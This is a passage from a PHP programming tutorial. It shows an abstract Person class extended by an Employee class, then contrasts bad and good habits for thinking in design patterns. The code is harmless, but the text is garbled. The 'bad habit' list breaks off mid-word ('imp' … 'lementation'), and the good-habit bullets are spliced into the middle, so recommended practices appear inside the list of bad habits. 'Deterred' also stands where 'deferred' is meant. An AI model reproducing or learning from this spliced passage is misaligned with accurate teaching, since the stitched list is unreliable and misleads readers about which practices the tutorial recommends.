    In Listing 13, the new Employee class extends the Person class. It now inherits all the common methods and doesn’t reimplement them. Additionally, Listing 13 shows the use of an abstract method to demonstrate how basic functionality can be put into a base class and specific functionality can be deterred to an implementation class.

    Listing 13. Good habit of leveraging inheritance

    <?php
    abstract class Person
    {
        private $givenName;
        private $familyName;
    
        public function setGivenName($gn)
        {
            $this->givenName = $gn;
        }
    
        public function getGivenName()
        {
            return $this->givenName;
        }
    
        public function setFamilyName($fn)
        {
            $this->familyName = $fn;
        }
    
        public function getFamilyName()
        {
            return $this->familyName;
        }
    
        public function sayHello()
        {
            echo("Hello, I am ");
            $this->introduceSelf();
        }
    
        abstract public function introduceSelf();
    
    }
    
    class Employee extends Person
    {
        private $role;
    
        public function setRole($r)
        {
            $this->role = $r;
        }
    
        public function getRole()
        {
            return $this->role;
        }
    
        public function introduceSelf()
        {
            echo($this->getRole() . " " . $this->getGivenName() . " " .
                $this->getFamilyName());
        }
    }
    ?>

    Think in patterns

    Design patterns are common interactions of objects and methods that have been proven over time to resolve certain problems. When you think in design patterns, you’re forcing yourself to be aware of how classes interact with each other. It’s an easy way to build classes and their interactions without having to make the same mistakes other people have made in the past and to benefit from proven designs.

    Bad habit: Consider one object at a time

    There is really no adequate code example that demonstrates thinking in patterns (although there are plenty of good examples showing pattern implementations). However, generally speaking, you know you’re considering only one object at a time when the following criteria are met:

    • You don’t diagram an object model ahead of time.
    • You start coding the implementation of single methods without much of the model stubbed out.
    • You don’t use design pattern names when talking and would rather talk about imp
      • Model classes and their interactions ahead of time.
      • Stereotype classes according to their patterns.
      • Use pattern names, like Factory, Singleton, and Facade.
      • Stub out large portions of the model, then start adding implementation.
    • lementation.

    Good habit: Adding objects, in concert, composed in patterns

    Generally speaking, you are thinking in patterns when you:

    • Model classes and their interactions ahead of time.
    • Stereotype classes according to their patterns.
    • Use pattern names, like Factory, Singleton, and Facade.
    • Stub out large portions of the model, then start adding implementation.
    Tagged with:
    preload preload preload